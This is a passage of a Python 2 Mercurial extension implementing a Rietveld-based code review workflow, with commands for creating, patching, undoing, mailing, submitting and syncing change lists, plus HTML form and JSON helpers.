    # dirty maps CL -> True for CLs that need flushing at the end.
    dirty = {}
    if len(pats) > 0 and GoodCLName(pats[0]):
        # Editing an existing CL named on the command line.
        name = pats[0]
        if len(pats) != 1:
            return "cannot specify CL name and file patterns"
        pats = pats[1:]
        cl, err = LoadCL(ui, repo, name, web=True)
        if err != '':
            return err
        if not cl.local and (opts["stdin"] or not opts["stdout"]):
            return "cannot change non-local CL " + name
    else:
        # No CL named: create a new one from the file patterns.
        name = "new"
        cl = CL("new")
        if repo[None].branch() != "default":
            return "cannot create CL outside default branch"
        dirty[cl] = True
    files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))

    # Handle -d (delete everywhere) and -D (delete local record only).
    if opts["delete"] or opts["deletelocal"]:
        if opts["delete"] and opts["deletelocal"]:
            return "cannot use -d and -D together"
        flag = "-d"
        if opts["deletelocal"]:
            flag = "-D"
        if name == "new":
            return "cannot use "+flag+" with file patterns"
        if opts["stdin"] or opts["stdout"]:
            return "cannot use "+flag+" with -i or -o"
        if not cl.local:
            return "cannot change non-local CL " + name
        if opts["delete"]:
            if cl.copied_from:
                return "original author must delete CL; hg change -D will remove locally"
            # Abandon the issue on the server before removing locally.
            PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
            EditDesc(cl.name, closed=True, private=cl.private)
        cl.Delete(ui, repo)
        return

    if opts["stdin"]:
        # Non-interactive edit: read the CL text from standard input.
        s = sys.stdin.read()
        clx, line, err = ParseCL(s, name)
        if err != '':
            return "error parsing change list: line %d: %s" % (line, err)
        if clx.desc is not None:
            cl.desc = clx.desc;
            dirty[cl] = True
        if clx.reviewer is not None:
            cl.reviewer = clx.reviewer
            dirty[cl] = True
        if clx.cc is not None:
            cl.cc = clx.cc
            dirty[cl] = True
        if clx.files is not None:
            cl.files = clx.files
            dirty[cl] = True
        if clx.private != cl.private:
            cl.private = clx.private
            dirty[cl] = True

    if not opts["stdin"] and not opts["stdout"]:
        # Interactive edit in the user's editor.
        if name == "new":
            cl.files = files
        err = EditCL(ui, repo, cl)
        if err != "":
            return err
        dirty[cl] = True

    # Persist modified CLs; a new CL is also uploaded to get its number.
    for d, _ in dirty.items():
        name = d.name
        d.Flush(ui, repo)
        if name == "new":
            d.Upload(ui, repo, quiet=True)

    if opts["stdout"]:
        ui.write(cl.EditorText())
    elif opts["pending"]:
        ui.write(cl.PendingText())
    elif name == "new":
        if ui.quiet:
            ui.write(cl.name)
        else:
            ui.write("CL created: " + cl.url + "\n")
    return
#######################################################################
# hg code-login (broken?)

def code_login(ui, repo, **opts):
    """log in to code review server

    Logs in to the code review server, saving a cookie in
    a file in your home directory.
    """
    if codereview_disabled:
        return codereview_disabled

    # MySend(None) performs the authentication round-trip as a side
    # effect without sending a real request.
    MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.

def clpatch(ui, repo, clname, **opts):
    """import a patch from the code review server

    Imports a patch from the code review server into the local client.
    If the local client has already modified any of the files that the
    patch modifies, this command will refuse to apply the patch.

    Submitting an imported patch will keep the original author's
    name as the Author: line but add your own name to a Committer: line.
    """
    if repo[None].branch() != "default":
        return "cannot run hg clpatch outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
    """undo the effect of a CL

    Creates a new CL that undoes an earlier CL.
    After creating the CL, opens the CL text for editing so that
    you can add the reason for the undo to the description.
    """
    if repo[None].branch() != "default":
        return "cannot run hg undo outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
    """apply a CL to the release branch

    Creates a new CL copying a previously committed change
    from the main branch to the release branch.
    The current client must either be clean or already be in
    the release branch.

    The release branch must be created by starting with a
    clean client, disabling the code review plugin, and running:

        hg update weekly.YYYY-MM-DD
        hg branch release-branch.rNN
        hg commit -m 'create release-branch.rNN'
        hg push --new-branch

    Then re-enable the code review plugin.

    People can test the release branch by running

        hg update release-branch.rNN

    in a clean client. To return to the normal tree,

        hg update default

    Move changes since the weekly into the release branch
    using hg release-apply followed by the usual code review
    process and hg submit.

    When it comes time to tag the release, record the
    final long-form tag of the release-branch.rNN
    in the *default* branch's .hgtags file. That is, run

        hg update default

    and then edit .hgtags as you would for a weekly.
    """
    c = repo[None]
    if not releaseBranch:
        return "no active release branches"
    if c.branch() != releaseBranch:
        # Switch to the release branch, refusing to clobber local edits.
        if c.modified() or c.added() or c.removed():
            raise hg_util.Abort("uncommitted local changes - cannot switch branches")
        err = hg_clean(repo, releaseBranch)
        if err:
            return err
    try:
        err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
        if err:
            raise hg_util.Abort(err)
    except Exception, e:
        # On any failure return the client to the default branch before
        # propagating the error.
        hg_clean(repo, "default")
        raise e
    return None
def rev2clname(rev):
    # Extract the CL number from a revision description.  The last
    # codereview URL line in the description is the authoritative one;
    # earlier matches may be quoted text in the user-written description.
    matches = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
    if matches:
        return matches[-1]
    return ""
# Templates for the descriptions of CLs generated by "hg undo" and
# release-branch backports; filled in by clpatch_or_undo.  The guillemet
# markers bracket the original CL description.
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""

undoFooter = """
»»»
"""

backportHeader = """[%s] %s
««« CL %s / %s
"""

backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
    """Shared implementation of hg clpatch, hg undo, and hg release-apply.

    mode is one of:
      * "clpatch"  - download the CL's diff from the code review server
                     and apply it to the working directory.
      * "undo"     - create a new CL whose patch reverses a committed
                     revision.
      * "backport" - create a new CL copying a committed revision onto
                     the release branch.
    Returns an error string on failure, or None on success.
    """
    if codereview_disabled:
        return codereview_disabled

    if mode == "undo" or mode == "backport":
        # Find revision in Mercurial repository.
        # Assume CL number is 7+ decimal digits.
        # Otherwise is either change log sequence number (fewer decimal digits),
        # hexadecimal hash, or tag name.
        # Mercurial will fall over long before the change log
        # sequence numbers get to be 7 digits long.
        if re.match('^[0-9]{7,}$', clname):
            found = False
            for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
                rev = repo[r]
                # Last line with a code review URL is the actual review URL.
                # Earlier ones might be part of the CL description.
                n = rev2clname(rev)
                if n == clname:
                    found = True
                    break
            if not found:
                return "cannot find CL %s in local repository" % clname
        else:
            rev = repo[clname]
            if not rev:
                return "unknown revision %s" % clname
            clname = rev2clname(rev)
            if clname == "":
                return "cannot find CL name in revision description"

        # Create fresh CL and start with patch that would reverse the change.
        vers = hg_node.short(rev.node())
        cl = CL("new")
        desc = str(rev.description())
        if mode == "undo":
            cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
        else:
            # FIX: previously closed with undoFooter; backportFooter is the
            # matching closer for backportHeader.  The two footers are
            # textually identical today, so behavior is unchanged, but the
            # pairing is now consistent if either template changes.
            cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + backportFooter
        v1 = vers
        v0 = hg_node.short(rev.parents()[0].node())
        if mode == "undo":
            # Reverse diff: new version back to its parent.
            arg = v1 + ":" + v0
        else:
            # Forward diff: parent up to the committed version.
            vers = v0
            arg = v0 + ":" + v1
        patch = RunShell(["hg", "diff", "--git", "-r", arg])

    else:  # clpatch
        cl, vers, patch, err = DownloadCL(ui, repo, clname)
        if err != "":
            return err
        if patch == emptydiff:
            return "codereview issue %s has no diff" % clname

    # find current hg version (hg identify)
    ctx = repo[None]
    parents = ctx.parents()
    id = '+'.join([hg_node.short(p.node()) for p in parents])

    # if version does not match the patch version,
    # try to update the patch line numbers.
    if vers != "" and id != vers:
        # "vers in repo" gives the wrong answer
        # on some versions of Mercurial.  Instead, do the actual
        # lookup and catch the exception.
        try:
            repo[vers].description()
        except:
            return "local repository is out of date; sync to get %s" % (vers)
        patch1, err = portPatch(repo, patch, vers, id)
        if err != "":
            if not opts["ignore_hgpatch_failure"]:
                return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
        else:
            patch = patch1
    argv = ["hgpatch"]
    if opts["no_incoming"] or mode == "backport":
        argv += ["--checksync=false"]
    try:
        cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
    except:
        return "hgpatch: " + ExceptionDetail()
    out, err = cmd.communicate(patch)
    if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
        return "hgpatch failed"
    cl.local = True
    # hgpatch prints the list of files it touched.
    cl.files = out.strip().split()
    if not cl.files and not opts["ignore_hgpatch_failure"]:
        return "codereview issue %s has no changed files" % clname
    files = ChangedFiles(ui, repo, [])
    extra = Sub(cl.files, files)
    if extra:
        ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
    cl.Flush(ui, repo)
    if mode == "undo":
        # Force the user to fill in the <enter reason for undo> stub.
        err = EditCL(ui, repo, cl)
        if err != "":
            return "CL created, but error editing: " + err
        cl.Flush(ui, repo)
    else:
        ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
    """Adjust the @@ hunk headers in patch so that a diff computed
    against oldver applies to newver.

    Returns (newpatch, "") on success or (None, errormsg) on failure.
    """
    lines = patch.splitlines(True)  # True = keep \n
    delta = None
    for i in range(len(lines)):
        line = lines[i]
        if line.startswith('--- a/'):
            # New file section: recompute the line-number deltas for it.
            file = line[6:-1]
            delta = fileDeltas(repo, file, oldver, newver)
        if not delta or not line.startswith('@@ '):
            continue
        # @@ -x,y +z,w @@ means the patch chunk replaces
        # the original file's line numbers x up to x+y with the
        # line numbers z up to z+w in the new file.
        # Find the delta from x in the original to the same
        # line in the current version and add that delta to both
        # x and z.
        m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
        if not m:
            return None, "error parsing patch line numbers"
        n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
        d, err = lineDelta(delta, n1, len1)
        if err != "":
            # FIX: was `return "", err`; return None for the patch on
            # failure, matching the parse-error return above.  Callers
            # only use the returned patch when err == "".
            return None, err
        n1 += d
        n2 += d
        lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)

    newpatch = ''.join(lines)
    return newpatch, ""
# fileDeltas returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
    cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
    output = RunShell(cmd, silent_ok=True)
    hunk = re.compile('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@')
    deltas = []
    for line in output.splitlines():
        m = hunk.match(line)
        if not m:
            continue
        # Old range [a, a+alen) became new range [b, b+blen); after the
        # hunk, line numbers shift by the difference of the range ends.
        a, alen, b, blen = [int(g) for g in m.groups()]
        deltas.append((a, alen, b + blen - (a + alen)))
    return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
    """Return (delta, "") to shift lines [n, n+len), or (0, errormsg)
    when that range overlaps a range modified between the two versions.

    deltas entries are (old, oldlen, newdelta) triples: lines
    [old, old+oldlen) were modified, and after that range line numbers
    shift by newdelta (see fileDeltas).
    """
    d = 0
    for (old, oldlen, newdelta) in deltas:
        # deltas are sorted by position; once past our range, stop.
        if old >= n+len:
            break
        # FIX: the overlap test must use the modified range's own length
        # (oldlen), not the query range's length (len).  [old, old+oldlen)
        # overlaps [n, n+len) exactly when old < n+len and old+oldlen > n.
        if old+oldlen > n:
            return 0, "patch and recent changes conflict"
        d = newdelta
    return d, ""
def download(ui, repo, clname, **opts):
    """download a change from the code review server

    Download prints a description of the given change list
    followed by its diff, downloaded from the code review server.
    """
    if codereview_disabled:
        return codereview_disabled

    cl, vers, patch, err = DownloadCL(ui, repo, clname)
    if err != "":
        return err
    # Print the CL text first, then the patch itself.
    for chunk in (cl.EditorText(), patch):
        ui.write(chunk + "\n")
    return
#######################################################################
# hg file
def file(ui, repo, clname, pat, *pats, **opts):
    """assign files to or remove files from a change list

    Assign files to or (with -d) remove files from a change list.
    The -d option only removes files from the change list.
    It does not edit them or remove them from the repository.
    """
    # NOTE: the name intentionally shadows the builtin file();
    # Mercurial derives the command name ("hg file") from it.
    if codereview_disabled:
        return codereview_disabled

    pats = tuple([pat] + list(pats))
    if not GoodCLName(clname):
        return "invalid CL name " + clname

    # CLs whose file lists we modified and that need to be written back.
    dirty = {}
    cl, err = LoadCL(ui, repo, clname, web=False)
    if err != '':
        return err
    if not cl.local:
        return "cannot change non-local CL " + clname

    files = ChangedFiles(ui, repo, pats)

    if opts["delete"]:
        # Remove the matching files from this CL only.
        oldfiles = Intersect(files, cl.files)
        if oldfiles:
            if not ui.quiet:
                ui.status("# Removing files from CL. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                for f in oldfiles:
                    ui.status("# hg file %s %s\n" % (cl.name, f))
            cl.files = Sub(cl.files, oldfiles)
            cl.Flush(ui, repo)
        else:
            ui.status("no such files in CL")
        return

    if not files:
        return "no such modified files"

    files = Sub(files, cl.files)
    # A file may belong to at most one CL; steal any already-assigned
    # files from their current CLs.
    taken = Taken(ui, repo)
    warned = False
    for f in files:
        if f in taken:
            if not warned and not ui.quiet:
                ui.status("# Taking files from other CLs. To undo:\n")
                ui.status("# cd %s\n" % (repo.root))
                warned = True
            ocl = taken[f]
            if not ui.quiet:
                ui.status("# hg file %s %s\n" % (ocl.name, f))
            if ocl not in dirty:
                ocl.files = Sub(ocl.files, files)
                dirty[ocl] = True
    cl.files = Add(cl.files, files)
    dirty[cl] = True
    # Persist every CL whose file list changed.
    for d, _ in dirty.items():
        d.Flush(ui, repo)
    return
#######################################################################
# hg gofmt
def gofmt(ui, repo, *pats, **opts):
    """apply gofmt to modified files

    Applies gofmt to the modified files in the repository that match
    the given patterns.
    """
    if codereview_disabled:
        return codereview_disabled

    files = ChangedExistingFiles(ui, repo, pats, opts)
    # gofmt only understands Go source files.
    files = [f for f in files if f.endswith(".go")]
    if not files:
        return "no modified go files"
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    try:
        cmd = ["gofmt", "-l"]
        if not opts["list"]:
            # -w rewrites files in place; with --list we only report them.
            cmd += ["-w"]
        if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
            raise hg_util.Abort("gofmt did not exit cleanly")
    except hg_error.Abort, e:
        # Pass our own aborts through unchanged.
        raise
    except:
        raise hg_util.Abort("gofmt: " + ExceptionDetail())
    return
#######################################################################
# hg mail
def mail(ui, repo, *pats, **opts):
    """mail a change for review

    Uploads a patch to the code review server and then sends mail
    to the reviewer and CC list asking for a review.
    """
    if codereview_disabled:
        return codereview_disabled

    cl, errmsg = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
    if errmsg != "":
        return errmsg
    cl.Upload(ui, repo, gofmt_just_warn=True)
    if not cl.reviewer:
        # If no reviewer is listed, assign the review to defaultcc.
        # This makes sure that it appears in the
        # codereview.appspot.com/user/defaultcc
        # page, so that it doesn't get dropped on the floor.
        if not defaultcc:
            return "no reviewers listed in CL"
        cl.cc = Sub(cl.cc, defaultcc)
        cl.reviewer = defaultcc
        cl.Flush(ui, repo)
    if cl.files == []:
        return "no changed files, not sending mail"
    cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
def ps(ui, repo, *pats, **opts):
    """alias for hg p --short
    """
    # Delegate to pending with the short flag forced on.
    return pending(ui, repo, *pats, **dict(opts, short=True))
def pq(ui, repo, *pats, **opts):
    """alias for hg p --quick
    """
    # Delegate to pending with the quick flag forced on.
    return pending(ui, repo, *pats, **dict(opts, quick=True))
def pending(ui, repo, *pats, **opts):
    """show pending changes

    Lists pending changes followed by a list of unassigned but modified files.
    """
    if codereview_disabled:
        return codereview_disabled

    quick = opts.get('quick', False)
    short = opts.get('short', False)
    # Skip the (slow) server round trip in quick/short mode.
    m = LoadAllCL(ui, repo, web=not quick and not short)
    for name in sorted(m.keys()):
        cl = m[name]
        if short:
            ui.write(name + "\t" + line1(cl.desc) + "\n")
        else:
            ui.write(cl.PendingText(quick=quick) + "\n")

    if short:
        return
    files = DefaultFiles(ui, repo, [])
    if len(files) > 0:
        text = "Changed files not in any CL:\n"
        for f in files:
            text += "\t" + f + "\n"
        ui.write(text)
#######################################################################
# hg submit
def need_sync():
    # The local repository is behind the remote one; submitting now would
    # create a new head, so force the user to sync first.
    raise hg_util.Abort("local repository out of date; must sync before submit")
def submit(ui, repo, *pats, **opts):
    """submit change to remote repository

    Submits change to remote repository.
    Bails out if the local repository is not in sync with the remote one.
    """
    if codereview_disabled:
        return codereview_disabled

    # We already called this on startup but sometimes Mercurial forgets.
    set_mercurial_encoding_to_utf8()

    if not opts["no_incoming"] and hg_incoming(ui, repo):
        need_sync()

    cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
    if err != "":
        return err

    # For a copied CL, attribute authorship to the original owner.
    user = None
    if cl.copied_from:
        user = cl.copied_from
    userline = CheckContributor(ui, repo, user)
    typecheck(userline, str)

    # Assemble the R=/TBR=/CC= trailer block for the commit message.
    about = ""
    if cl.reviewer:
        about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
    if opts.get('tbr'):
        tbr = SplitCommaSpace(opts.get('tbr'))
        cl.reviewer = Add(cl.reviewer, tbr)
        about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
    if cl.cc:
        about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"

    if not cl.reviewer:
        return "no reviewers listed in CL"

    if not cl.local:
        return "cannot submit non-local CL"

    # upload, to sync current patch and also get change number if CL is new.
    if not cl.copied_from:
        cl.Upload(ui, repo, gofmt_just_warn=True)

    # check gofmt for real; allowed upload to warn in order to save CL.
    cl.Flush(ui, repo)
    CheckFormat(ui, repo, cl.files)

    about += "%s%s\n" % (server_url_base, cl.name)

    if cl.copied_from:
        about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
    typecheck(about, str)

    if not cl.mailed and not cl.copied_from:  # in case this is TBR
        cl.Mail(ui, repo)

    # submit changes locally
    message = cl.desc.rstrip() + "\n\n" + about
    typecheck(message, str)

    set_status("pushing " + cl.name + " to remote server")

    if hg_outgoing(ui, repo):
        raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")

    old_heads = len(hg_heads(ui, repo).split())

    # The precommit hook rejects direct commits; temporarily allow ours.
    global commit_okay
    commit_okay = True
    ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
    commit_okay = False
    if ret:
        return "nothing changed"
    node = repo["-1"].node()

    # push to remote; if it fails for any reason, roll back
    try:
        new_heads = len(hg_heads(ui, repo).split())
        if old_heads != new_heads:
            # Created new head, so we weren't up to date.
            need_sync()

        # Push changes to remote. If it works, we're committed. If not, roll back.
        try:
            hg_push(ui, repo)
        except hg_error.Abort, e:
            if e.message.find("push creates new heads") >= 0:
                # Remote repository had changes we missed.
                need_sync()
            raise
    except:
        # Undo the local commit before re-raising.
        real_rollback()
        raise

    # We're committed. Upload final patch, close review, add commit message.
    changeURL = hg_node.short(node)
    url = ui.expandpath("default")
    m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
    if m:
        changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
    else:
        print >>sys.stderr, "URL: ", url
    pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message

    # When posting, move reviewers to CC line,
    # so that the issue stops showing up in their "My Issues" page.
    PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))

    if not cl.copied_from:
        EditDesc(cl.name, closed=True, private=cl.private)
    cl.Delete(ui, repo)

    # If this submit emptied out a clean release-branch client,
    # switch back to the default branch.
    c = repo[None]
    if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
        ui.write("switching from %s to default branch.\n" % releaseBranch)
        err = hg_clean(repo, "default")
        if err:
            return err
    return None
#######################################################################
# hg sync
def sync(ui, repo, **opts):
    """synchronize with remote repository

    Incorporates recent changes from the remote repository
    into the local repository.
    """
    if codereview_disabled:
        return codereview_disabled

    if not opts["local"]:
        # Pull from the remote repository and update the working directory.
        pull_err = hg_pull(ui, repo, update=True)
        if pull_err:
            return pull_err
    sync_changes(ui, repo)
def sync_changes(ui, repo):
    # Close out local CLs that have already been submitted, and drop
    # no-longer-modified files from the remaining CLs.

    # Look through recent change log descriptions to find
    # potential references to http://.*/our-CL-number.
    # Double-check them by looking at the Rietveld log.
    for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
        desc = repo[rev].description().strip()
        for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
            if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
                ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
                cl, err = LoadCL(ui, repo, clname, web=False)
                if err != "":
                    ui.warn("loading CL %s: %s\n" % (clname, err))
                    continue
                if not cl.copied_from:
                    # Only close the server-side issue for CLs we own.
                    EditDesc(cl.name, closed=True, private=cl.private)
                cl.Delete(ui, repo)

    # Remove files that are not modified from the CLs in which they appear.
    all = LoadAllCL(ui, repo, web=False)
    changed = ChangedFiles(ui, repo, [])
    for cl in all.values():
        extra = Sub(cl.files, changed)
        if extra:
            ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
            for f in extra:
                ui.warn("\t%s\n" % (f,))
            cl.files = Sub(cl.files, extra)
            cl.Flush(ui, repo)
        if not cl.files:
            # Empty CLs are left for the user to delete explicitly.
            if not cl.copied_from:
                ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
            else:
                ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
    return
#######################################################################
# hg upload
def upload(ui, repo, name, **opts):
    """upload diffs to the code review server

    Uploads the current modifications for a given change to the server.
    """
    if codereview_disabled:
        return codereview_disabled

    # Suppress Mercurial chatter during the upload.
    repo.ui.quiet = True
    cl, err = LoadCL(ui, repo, name, web=True)
    if err != "":
        return err
    if not cl.local:
        return "cannot upload non-local change"
    cl.Upload(ui, repo)
    # Print the issue URL for convenience.
    print "%s%s\n" % (server_url_base, cl.name)
    return
#######################################################################
# Table of commands, supplied to Mercurial for installation.
# Option table shared by the commands that send changes out for
# review (mail, submit).
review_opts = [
    ('r', 'reviewer', '', 'add reviewer'),
    ('', 'cc', '', 'add cc'),
    ('', 'tbr', '', 'add future reviewer'),
    ('m', 'message', '', 'change description (for new change)'),
]
# Each entry maps a command name to (function, option table, synopsis).
cmdtable = {
    # The ^ means to show this command in the help text that
    # is printed when running hg with no arguments.
    "^change": (
        change,
        [
            ('d', 'delete', None, 'delete existing change list'),
            ('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
            ('i', 'stdin', None, 'read change list from standard input'),
            ('o', 'stdout', None, 'print change list to standard output'),
            ('p', 'pending', None, 'print pending summary to standard output'),
        ],
        "[-d | -D] [-i] [-o] change# or FILE ..."
    ),
    "^clpatch": (
        clpatch,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    # Would prefer to call this codereview-login, but then
    # hg help codereview prints the help for this command
    # instead of the help for the extension.
    "code-login": (
        code_login,
        [],
        "",
    ),
    "^download": (
        download,
        [],
        "change#"
    ),
    "^file": (
        file,
        [
            ('d', 'delete', None, 'delete files from change list (but not repository)'),
        ],
        "[-d] change# FILE ..."
    ),
    "^gofmt": (
        gofmt,
        [
            ('l', 'list', None, 'list files that would change, but do not edit them'),
        ],
        "FILE ..."
    ),
    "^pending|p": (
        pending,
        [
            ('s', 'short', False, 'show short result form'),
            ('', 'quick', False, 'do not consult codereview server'),
        ],
        "[FILE ...]"
    ),
    "^ps": (
        ps,
        [],
        "[FILE ...]"
    ),
    "^pq": (
        pq,
        [],
        "[FILE ...]"
    ),
    "^mail": (
        mail,
        review_opts + [
        ] + hg_commands.walkopts,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^release-apply": (
        release_apply,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    # TODO: release-start, release-tag, weekly-tag
    "^submit": (
        submit,
        review_opts + [
            ('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
        ] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
        "[-r reviewer] [--cc cc] [change# | file ...]"
    ),
    "^sync": (
        sync,
        [
            ('', 'local', None, 'do not pull changes from remote repository')
        ],
        "[--local]",
    ),
    "^undo": (
        undo,
        [
            ('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
            ('', 'no_incoming', None, 'disable check for incoming changes'),
        ],
        "change#"
    ),
    "^upload": (
        upload,
        [],
        "change#"
    ),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
    """(disabled when using this extension)"""
    # Installed over repo.rollback in reposetup; rollback would remove a
    # commit behind the code review system's back.
    raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
def reposetup(ui, repo):
    """Mercurial extension hook: wire the code review machinery into repo.

    Reads repository-specific options from lib/codereview/codereview.cfg,
    initializes the Rietveld connection, and disables the Mercurial
    operations (commit, rollback) that would bypass code review.  Instead
    of failing, sets the global codereview_disabled message when the
    repository does not look like a code review repository.
    """
    global codereview_disabled
    global defaultcc

    repo_config_path = ''
    # Read repository-specific options from lib/codereview/codereview.cfg
    try:
        repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
        f = open(repo_config_path)
        prefix = 'defaultcc: '
        for line in f:
            if line.startswith(prefix):
                # FIX: was line[10:], which kept the prefix's trailing
                # space ('defaultcc: ' is 11 characters).  Harmless before
                # only because SplitCommaSpace strips whitespace; slice by
                # the prefix length instead.
                defaultcc = SplitCommaSpace(line[len(prefix):])
        f.close()
    except:
        # If there are no options, chances are good this is not
        # a code review repository; stop now before we foul
        # things up even worse. Might also be that repo doesn't
        # even have a root. See issue 959.
        if repo_config_path == '':
            codereview_disabled = 'codereview disabled: repository has no root'
        else:
            codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
        return

    InstallMatch(ui, repo)
    ReadContributors(ui, repo)
    RietveldSetup(ui, repo)

    # Disable the Mercurial commands that might change the repository.
    # Only commands in this extension are supposed to do that.
    ui.setconfig("hooks", "precommit.codereview", precommithook)

    # Rollback removes an existing commit. Don't do that either.
    global real_rollback
    real_rollback = repo.rollback
    repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
# HTML form parser
class FormParser(HTMLParser):
    """Collects the name/value pairs of <input> and <textarea> elements
    from an HTML page (used to scrape Rietveld's edit/publish forms)."""
    def __init__(self):
        # form field name -> field value
        self.map = {}
        # name of the <textarea> currently being read, if any
        self.curtag = None
        # accumulated character data for that textarea
        self.curdata = None
        HTMLParser.__init__(self)
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            # <input> carries its value in the attributes.
            key = None
            value = ''
            for a in attrs:
                if a[0] == 'name':
                    key = a[1]
                if a[0] == 'value':
                    value = a[1]
            if key is not None:
                self.map[key] = value
        if tag == "textarea":
            # <textarea> content arrives via handle_data until the end tag.
            key = None
            for a in attrs:
                if a[0] == 'name':
                    key = a[1]
            if key is not None:
                self.curtag = key
                self.curdata = ''
    def handle_endtag(self, tag):
        if tag == "textarea" and self.curtag is not None:
            self.map[self.curtag] = self.curdata
            self.curtag = None
            self.curdata = None
    def handle_charref(self, name):
        # Numeric character reference, e.g. &#65;
        self.handle_data(unichr(int(name)))
    def handle_entityref(self, name):
        # Named entity, e.g. &amp;; unknown entities pass through verbatim.
        import htmlentitydefs
        if name in htmlentitydefs.entitydefs:
            self.handle_data(htmlentitydefs.entitydefs[name])
        else:
            self.handle_data("&" + name + ";")
    def handle_data(self, data):
        if self.curdata is not None:
            self.curdata += data
def JSONGet(ui, path):
    # Fetch path from the code review server and decode the response as
    # JSON, normalized by fix_json.  Best effort: returns None (after
    # printing a warning) on any network or decoding error.
    try:
        data = MySend(path, force_auth=False)
        typecheck(data, str)
        d = fix_json(json.loads(data))
    except:
        ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
        return None
    return d
# Clean up json parser output to match our expectations:
#   * all strings are UTF-8-encoded str, not unicode.
#   * missing fields are missing, not None,
#     so that d.get("foo", defaultvalue) works.
def fix_json(x):
    # Recursively normalize a decoded JSON value; lists and dicts are
    # rewritten in place, scalars are returned converted.
    if type(x) in [str, int, float, bool, type(None)]:
        pass
    elif type(x) is unicode:
        x = x.encode("utf-8")
    elif type(x) is list:
        for i in range(len(x)):
            x[i] = fix_json(x[i])
    elif type(x) is dict:
        # Collect None-valued keys first; deleting while iterating a
        # dict is not allowed.
        todel = []
        for k in x:
            if x[k] is None:
                todel.append(k)
            else:
                x[k] = fix_json(x[k])
        for k in todel:
            del x[k]
    else:
        raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
    if type(x) is str:
        # Normalize line endings in all strings.
        x = x.replace('\r\n', '\n')
    return x
